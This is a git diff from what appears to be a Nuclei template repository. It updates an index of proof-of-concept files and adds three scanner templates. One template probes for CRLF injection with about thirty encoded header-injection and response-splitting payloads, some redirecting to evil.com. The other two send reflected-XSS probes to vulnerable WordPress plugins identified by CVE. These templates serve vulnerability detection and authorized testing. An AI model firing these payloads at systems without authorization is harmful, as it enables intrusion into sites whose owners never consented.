20241130

date.txt

@@ -1 +1 @@
-20241129
+20241130

poc.txt

@@ -8216,6 +8216,7 @@
 ./poc/crlf_injection/crlf-injection-9.yaml
 ./poc/crlf_injection/crlf-injection.yaml
 ./poc/crlf_injection/crlf.yaml
+./poc/crlf_injection/crlfi.yaml
 ./poc/crlf_injection/custom-crlf-injection.yaml
 ./poc/crlf_injection/viewlinc-crlf-injection-11011.yaml
 ./poc/crlf_injection/viewlinc-crlf-injection-11012.yaml
@@ -8918,6 +8919,7 @@
 ./poc/cve/CVE-2011-4618.yaml
 ./poc/cve/CVE-2011-4624-2074.yaml
 ./poc/cve/CVE-2011-4624-2075.yaml
+./poc/cve/CVE-2011-4624-2079.yaml
 ./poc/cve/CVE-2011-4624-2080.yaml
 ./poc/cve/CVE-2011-4624-deb27e459bccc6c567e77bedadf302ef.yaml
 ./poc/cve/CVE-2011-4624.yaml
@@ -9174,6 +9176,7 @@
 ./poc/cve/CVE-2012-4422-1d2f88fdfeb41427998c4f53a8b2df4b.yaml
 ./poc/cve/CVE-2012-4422.yaml
 ./poc/cve/CVE-2012-4547.yaml
+./poc/cve/CVE-2012-4768-2203.yaml
 ./poc/cve/CVE-2012-4768-2207.yaml
 ./poc/cve/CVE-2012-4768-ae0892b722f6493624f52f808ab513ef.yaml
 ./poc/cve/CVE-2012-4768.yaml
@@ -9419,6 +9422,7 @@
 ./poc/cve/CVE-2013-2251-9.yaml
 ./poc/cve/CVE-2013-2251.yaml
 ./poc/cve/CVE-2013-2287-2243.yaml
+./poc/cve/CVE-2013-2287-2248.yaml
 ./poc/cve/CVE-2013-2287-2249.yaml
 ./poc/cve/CVE-2013-2287-35fa1e30cd7c85480f6643f78205d60b.yaml
 ./poc/cve/CVE-2013-2287.yaml
@@ -9536,6 +9540,7 @@
 ./poc/cve/CVE-2013-3827-9.yaml
 ./poc/cve/CVE-2013-3827.yaml
 ./poc/cve/CVE-2013-4117-2260.yaml
+./poc/cve/CVE-2013-4117-2263.yaml
 ./poc/cve/CVE-2013-4117-22ce96479eabea66400d8f09cb8a6473.yaml
 ./poc/cve/CVE-2013-4117.yaml
 ./poc/cve/CVE-2013-4240-4fad04c2bd89be1b3f0a2d8e99e23b1e.yaml
@@ -10564,6 +10569,7 @@
 ./poc/cve/CVE-2015-1000011-6ef8738040302a74ae4f4262e6a4cba3.yaml
 ./poc/cve/CVE-2015-1000011.yaml
 ./poc/cve/CVE-2015-1000012-2460.yaml
+./poc/cve/CVE-2015-1000012-2461.yaml
 ./poc/cve/CVE-2015-1000012-bd172eb0a5f5b4fee2b93533e1882477.yaml
 ./poc/cve/CVE-2015-1000012.yaml
 ./poc/cve/CVE-2015-1000013-c88ce724ce8bc15e25be894a573aacd0.yaml
@@ -10926,6 +10932,7 @@
 ./poc/cve/CVE-2015-5469-58f92a4d584962fc92f57c003cb8298e.yaml
 ./poc/cve/CVE-2015-5469.yaml
 ./poc/cve/CVE-2015-5471-2558.yaml
+./poc/cve/CVE-2015-5471-2561.yaml
 ./poc/cve/CVE-2015-5471-ecf657109fd5ee17ddaeffec729554cb.yaml
 ./poc/cve/CVE-2015-5471.yaml
 ./poc/cve/CVE-2015-5472-693f5c61a33530cf4316e54b3cd90461.yaml
@@ -11612,6 +11619,7 @@
 ./poc/cve/CVE-2016-1000132-2669.yaml
 ./poc/cve/CVE-2016-1000132-eca521eb466c9a0703b816e37fd90898.yaml
 ./poc/cve/CVE-2016-1000132.yaml
+./poc/cve/CVE-2016-1000133-2671.yaml
 ./poc/cve/CVE-2016-1000133-68f0438e7e19c3eabe08c84e10c94850.yaml
 ./poc/cve/CVE-2016-1000133.yaml
 ./poc/cve/CVE-2016-1000134-2678.yaml
@@ -11633,6 +11641,7 @@
 ./poc/cve/CVE-2016-1000138-2694.yaml
 ./poc/cve/CVE-2016-1000138-b8f6488df350796223032f6ce8716f9c.yaml
 ./poc/cve/CVE-2016-1000138.yaml
+./poc/cve/CVE-2016-1000139-2699.yaml
 ./poc/cve/CVE-2016-1000139-5a043184256624a09d5739ac78a02adf.yaml
 ./poc/cve/CVE-2016-1000139.yaml
 ./poc/cve/CVE-2016-1000140-2705.yaml
@@ -11671,6 +11680,7 @@
 ./poc/cve/CVE-2016-1000152-a0b3bb2e08793710304990cb632fbb8f.yaml
 ./poc/cve/CVE-2016-1000152.yaml
 ./poc/cve/CVE-2016-1000153-2733.yaml
+./poc/cve/CVE-2016-1000153-2735.yaml
 ./poc/cve/CVE-2016-1000153-de892b497579d25c72a68ec08f4653ec.yaml
 ./poc/cve/CVE-2016-1000153.yaml
 ./poc/cve/CVE-2016-1000154-2737.yaml
@@ -11880,6 +11890,7 @@
 ./poc/cve/CVE-2016-10956-1.yaml
 ./poc/cve/CVE-2016-10956-15f0e3a288dc18da8ad911eedc6e16df.yaml
 ./poc/cve/CVE-2016-10956-2.yaml
+./poc/cve/CVE-2016-10956-2759.yaml
 ./poc/cve/CVE-2016-10956-2761.yaml
 ./poc/cve/CVE-2016-10956.yaml
 ./poc/cve/CVE-2016-10957-8bed5c01be782b37319b0c32d015df98.yaml
@@ -12115,6 +12126,7 @@
 ./poc/cve/CVE-2017-1000163.yaml
 ./poc/cve/CVE-2017-1000170-2838.yaml
 ./poc/cve/CVE-2017-1000170-2840.yaml
+./poc/cve/CVE-2017-1000170-2841.yaml
 ./poc/cve/CVE-2017-1000170-2f1afbe99f3a4b3fbcd2086e71fd1ce6.yaml
 ./poc/cve/CVE-2017-1000170-8184254cd86a1fe25bafab70f7a81e9d.yaml
 ./poc/cve/CVE-2017-1000170-cba5d129f82e52594f1e1e2217fce5cc.yaml
@@ -12778,6 +12790,7 @@
 ./poc/cve/CVE-2017-4011.yaml
 ./poc/cve/CVE-2017-5487-1.yaml
 ./poc/cve/CVE-2017-5487-2.yaml
+./poc/cve/CVE-2017-5487-3022.yaml
 ./poc/cve/CVE-2017-5487-3023.yaml
 ./poc/cve/CVE-2017-5487-4b65f32de7f17fd71f04d0e39a862e3d.yaml
 ./poc/cve/CVE-2017-5487.yaml
@@ -13696,6 +13709,7 @@
 ./poc/cve/CVE-2018-7280.yaml
 ./poc/cve/CVE-2018-7282.yaml
 ./poc/cve/CVE-2018-7314.yaml
+./poc/cve/CVE-2018-7422-3592.yaml
 ./poc/cve/CVE-2018-7422-3594.yaml
 ./poc/cve/CVE-2018-7422-3595.yaml
 ./poc/cve/CVE-2018-7422-364c9e725b8200c8eda6850a76fb8265.yaml
@@ -14882,6 +14896,7 @@
 ./poc/cve/CVE-2020-11738-1.yaml
 ./poc/cve/CVE-2020-11738-16ea48f4974564ca778ec3e72eef73df.yaml
 ./poc/cve/CVE-2020-11738-2.yaml
+./poc/cve/CVE-2020-11738-4425.yaml
 ./poc/cve/CVE-2020-11738-564f05a961c81fb8d01fd0af4cb341d9.yaml
 ./poc/cve/CVE-2020-11738.yaml
 ./poc/cve/CVE-2020-11798.yaml
@@ -15207,6 +15222,7 @@
 ./poc/cve/CVE-2020-24149-f17b476af9729c706149033214bc1201.yaml
 ./poc/cve/CVE-2020-24149.yaml
 ./poc/cve/CVE-2020-24186-4794.yaml
+./poc/cve/CVE-2020-24186-4798.yaml
 ./poc/cve/CVE-2020-24186-e802709dd363f61b6f07669be7eb580d.yaml
 ./poc/cve/CVE-2020-24186.yaml
 ./poc/cve/CVE-2020-24223 2.yaml
@@ -16049,6 +16065,7 @@
 ./poc/cve/CVE-2021-21315.yaml
 ./poc/cve/CVE-2021-21345.yaml
 ./poc/cve/CVE-2021-21351.yaml
+./poc/cve/CVE-2021-21389-5509.yaml
 ./poc/cve/CVE-2021-21389-5511.yaml
 ./poc/cve/CVE-2021-21389-7301b80e7e646646266c1215187adbab.yaml
 ./poc/cve/CVE-2021-21389.yaml
@@ -16316,6 +16333,7 @@
 ./poc/cve/CVE-2021-24224.yaml
 ./poc/cve/CVE-2021-24225-bcf995267e90e3cc63f9a02bf6b87efc.yaml
 ./poc/cve/CVE-2021-24225.yaml
+./poc/cve/CVE-2021-24226-5645.yaml
 ./poc/cve/CVE-2021-24226-ce003cda2a7fdf989943ff2a7c0fe217.yaml
 ./poc/cve/CVE-2021-24226.yaml
 ./poc/cve/CVE-2021-24227-656a26809b7464f324229a4abc1031bd.yaml
@@ -16427,6 +16445,7 @@
 ./poc/cve/CVE-2021-24275.yaml
 ./poc/cve/CVE-2021-24276-27aea195e1a30d033ced30a12937ee81.yaml
 ./poc/cve/CVE-2021-24276-5664.yaml
+./poc/cve/CVE-2021-24276-5666.yaml
 ./poc/cve/CVE-2021-24276.yaml
 ./poc/cve/CVE-2021-24277-a9b3b73eb42fa5bd0785720ab1f1312f.yaml
 ./poc/cve/CVE-2021-24277.yaml
@@ -16448,6 +16467,7 @@
 ./poc/cve/CVE-2021-24284-6b9e931d32f149102538eb4138b98a06.yaml
 ./poc/cve/CVE-2021-24284.yaml
 ./poc/cve/CVE-2021-24285-1e351fe03157cfef97611aeb987561d8.yaml
+./poc/cve/CVE-2021-24285-5672.yaml
 ./poc/cve/CVE-2021-24285-5674.yaml
 ./poc/cve/CVE-2021-24285.yaml
 ./poc/cve/CVE-2021-24286-bb438ca91bbe39dc03a706e917de013b.yaml
@@ -16462,6 +16482,7 @@
 ./poc/cve/CVE-2021-24289.yaml
 ./poc/cve/CVE-2021-24290-e8fd43664cd0b029c9c174584ea48e8d.yaml
 ./poc/cve/CVE-2021-24290.yaml
+./poc/cve/CVE-2021-24291-5681.yaml
 ./poc/cve/CVE-2021-24291-5683.yaml
 ./poc/cve/CVE-2021-24291-eefec2c5385df5bdf65949b7b59e5ce1.yaml
 ./poc/cve/CVE-2021-24291.yaml
@@ -16480,6 +16501,7 @@
 ./poc/cve/CVE-2021-24297.yaml
 ./poc/cve/CVE-2021-24298-3527710bdd7422152bd92d39233e4083.yaml
 ./poc/cve/CVE-2021-24298-5687.yaml
+./poc/cve/CVE-2021-24298-5688.yaml
 ./poc/cve/CVE-2021-24298.yaml
 ./poc/cve/CVE-2021-24299-84d977bb82ff1a53a59c3cdc467e7f5d.yaml
 ./poc/cve/CVE-2021-24299.yaml
@@ -16618,6 +16640,7 @@
 ./poc/cve/CVE-2021-24362.yaml
 ./poc/cve/CVE-2021-24363-e60672dea6df6a1982deeada703c5473.yaml
 ./poc/cve/CVE-2021-24363.yaml
+./poc/cve/CVE-2021-24364-5719.yaml
 ./poc/cve/CVE-2021-24364-5721.yaml
 ./poc/cve/CVE-2021-24364-7702beddd0a0b2680c0837a95ad7470c.yaml
 ./poc/cve/CVE-2021-24364.yaml
@@ -16888,6 +16911,7 @@
 ./poc/cve/CVE-2021-24494.yaml
 ./poc/cve/CVE-2021-24495-1.yaml
 ./poc/cve/CVE-2021-24495-2.yaml
+./poc/cve/CVE-2021-24495-5747.yaml
 ./poc/cve/CVE-2021-24495-5748.yaml
 ./poc/cve/CVE-2021-24495-5749.yaml
 ./poc/cve/CVE-2021-24495-f9cf0d0ce26a12b4d4e222f02f196b48.yaml
@@ -17753,6 +17777,7 @@
 ./poc/cve/CVE-2021-24925-aa70f772f35eebbd4e897ed2495238c4.yaml
 ./poc/cve/CVE-2021-24925.yaml
 ./poc/cve/CVE-2021-24926-5771.yaml
+./poc/cve/CVE-2021-24926-5772.yaml
 ./poc/cve/CVE-2021-24926-f97d77190b2e643e991db2ebd1b44f14.yaml
 ./poc/cve/CVE-2021-24926.yaml
 ./poc/cve/CVE-2021-24927-23ac50f241a11a68dcb94fe66bc09dcd.yaml
@@ -18083,6 +18108,7 @@
 ./poc/cve/CVE-2021-25083.yaml
 ./poc/cve/CVE-2021-25084-350201e0914eb5ea016cac0048b643d4.yaml
 ./poc/cve/CVE-2021-25084.yaml
+./poc/cve/CVE-2021-25085(1).yaml
 ./poc/cve/CVE-2021-25085-4506892facaa2768445c7e7d0f827cdf.yaml
 ./poc/cve/CVE-2021-25085.yaml
 ./poc/cve/CVE-2021-25086-af99531c4ffe05bb3975c5e19f9386cc.yaml
@@ -18373,6 +18399,7 @@
 ./poc/cve/CVE-2021-34619.yaml
 ./poc/cve/CVE-2021-34620-251d8b5820dca9ea5da50bf244ee8601.yaml
 ./poc/cve/CVE-2021-34620.yaml
+./poc/cve/CVE-2021-34621-6230.yaml
 ./poc/cve/CVE-2021-34621-6233.yaml
 ./poc/cve/CVE-2021-34621-af2e411b557f020136c45a21885065b6.yaml
 ./poc/cve/CVE-2021-34621.yaml
@@ -34756,6 +34783,7 @@
 ./poc/cve/CVE-2024-1124.yaml
 ./poc/cve/CVE-2024-1125-5344a8df4ee7263657185efd443c0b22.yaml
 ./poc/cve/CVE-2024-1125.yaml
+./poc/cve/CVE-2024-11252-6eb54caff749470d94f371cf65690bbc.yaml
 ./poc/cve/CVE-2024-1126-1b1f550770c7ded4c68a1b5c108b2d09.yaml
 ./poc/cve/CVE-2024-1126-6bafa5b3da4f53df7d3b25cb59f59ac9.yaml
 ./poc/cve/CVE-2024-1126.yaml
@@ -44155,6 +44183,7 @@
 ./poc/cve/CVE-2024-5141.yaml
 ./poc/cve/CVE-2024-5147-87badd9e51b373ddad690f30e373ed39.yaml
 ./poc/cve/CVE-2024-5147.yaml
+./poc/cve/CVE-2024-51482.yaml
 ./poc/cve/CVE-2024-5149-1dbe73b3cdcfbad32c5427d0fa82971f.yaml
 ./poc/cve/CVE-2024-5149-cb0b445a00963d5ca10dab407fc7aec2.yaml
 ./poc/cve/CVE-2024-5149.yaml
@@ -63951,6 +63980,7 @@
 ./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yaml
 ./poc/local_file_inclusion/confluence-cve-2019-3396-lfi.yml
 ./poc/local_file_inclusion/crawlab-lfi.yaml
+./poc/local_file_inclusion/crlfi.yaml
 ./poc/local_file_inclusion/crystal-live-http-server-lfi.yaml
 ./poc/local_file_inclusion/crystal-live-server-lfi.yaml
 ./poc/local_file_inclusion/cs-cart-unauthenticated-lfi-1281.yaml
@@ -120931,6 +120961,7 @@
 ./poc/social/sassy-social-share-84a5eedc2c7c295c35500bc62a8396d6.yaml
 ./poc/social/sassy-social-share-a34761689eaa644ad687c3057f1cea97.yaml
 ./poc/social/sassy-social-share-a5f3e89e9addf53a71ff21bbc42590ef.yaml
+./poc/social/sassy-social-share-acaa8714dde25500236e86d780ca3722.yaml
 ./poc/social/sassy-social-share-c372a70b0b0f5eb13b274f6ac838408f.yaml
 ./poc/social/sassy-social-share-c8b6da7225f276c4859ca96837b8ba71.yaml
 ./poc/social/sassy-social-share-d41d8cd98f00b204e9800998ecf8427e.yaml

poc/crlf_injection/crlfi.yaml

@@ -0,0 +1,67 @@
+id: CRLFInjection
+info:
+  name: CRLF Injection Detection
+  author: coffin
+  severity: High
+  description: Detects various CRLF injection vectors that can be exploited for attacks such as header injection, response splitting, and XSS.
+  reference:
+    - https://book.hacktricks.xyz/pentesting-web/crlf-0d-0a
+  tags: crlf, crlf-ext, header-injection, response-splitting, xss
+  metadata:
+    max-request: 5
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%%0a0aSet-Cookie:coffin=hi"
+      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
+      - "{{BaseURL}}/%0d%0aLocation: http://evil.com"
+      - "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23"
+      - "{{BaseURL}}/%0d%0a%0d%0a<script>alert('XSS')</script>;"
+      - "{{BaseURL}}/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e"
+      - "{{BaseURL}}/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert('XSS');</script>"
+      - "{{BaseURL}}/%0d%0aHost: {{Hostname}}%0d%0aCookie: coffin=hi%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: coffin=hi%0d%0a%0d%0a"
+      - "{{BaseURL}}/%0d%0aLocation: www.evil.com"
+      - "{{BaseURL}}/%0d%0aSet-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%0aSet-Cookie:coffin=hi"
+      - "{{BaseURL}}/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<svg/onload=alert(document.domain)>"
+      - "{{BaseURL}}/%23%0aSet-Cookie:coffin=hi"
+      - "{{BaseURL}}/%25%30%61Set-Cookie:coffin=hi"
+      - "{{BaseURL}}/%2e%2e%2f%0d%0aSet-Cookie:coffin=hi"
+      - "{{BaseURL}}/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a<script>alert(document.cookie)</script>%2F../%2F..%2F..%2F..%2F../tr"
+      - "{{BaseURL}}/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<script>alert(document.domain)</script>"
+      - "{{BaseURL}}/%5Cr%20Set-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%5Cr%5Cn%20Set-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%E5%98%8A%E5%98%8DLocation:www.evil.com"
+      - "{{BaseURL}}/%E5%98%8D%E5%98%8ALocation:www.evil.com"
+      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi"
+      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi;"
+      - "{{BaseURL}}/%E5%98%8D%E5%98%8ASet-Cookie:coffinxp=coffinxp"
+      - "{{BaseURL}}/%u000ASet-Cookie:coffin=hi;"
+      - "{{BaseURL}}/www.evil.com/%2E%2E%2F%0D%0Acoffin-x:coffin-x"
+      - "{{BaseURL}}/www.evil.com/%2F..%0D%0Acoffin-x:coffin-x"
+    stop-at-first-match: false
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '(?m)^(?:Location\s*?:\s*(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)www\.evil\.com\/?(\/|[^.].*)?$|(?:Set-Cookie\s*?:\s*(?:\s*?|.*?;\s*)?coffin=hi(?:\s*?)(?:$|;)))'
+          - '(?m)^(?:Location\s*?:\s*(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)www\.evil\.com\/?(\/|[^.].*)?$|(?:Set-Cookie\s*?:\s*(?:\s*?|.*?;\s*)?coffin=hi(?:\s*?)(?:$|;)|coffin-x))'
+        part: header
+      - type: status
+        status:
+          - 200
+          - 201
+          - 202
+          - 204
+          - 205
+          - 206
+          - 207
+          - 301
+          - 302
+          - 307
+          - 308
+        condition: or

poc/cve/CVE-2011-4624-2079.yaml

@@ -0,0 +1,30 @@
+id: CVE-2011-4624
+
+info:
+  name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS)
+  author: daffainfo
+  severity: medium
+  description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624
+  tags: cve,cve2011,wordpress,xss,wp-plugin
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200

poc/cve/CVE-2012-4768-2203.yaml

@@ -0,0 +1,29 @@
+id: CVE-2012-4768
+info:
+  name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
+  author: daffainfo
+  severity: medium
+  description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
+  reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
+  tags: cve,cve2012,wordpress,xss,wp-plugin
+  classification:
+    cve-id: CVE-2012-4768
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "</script><script>alert(document.domain)</script>"
+        part: body
+      - type: word
+        part: header
+        words:
+          - text/html
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/02/21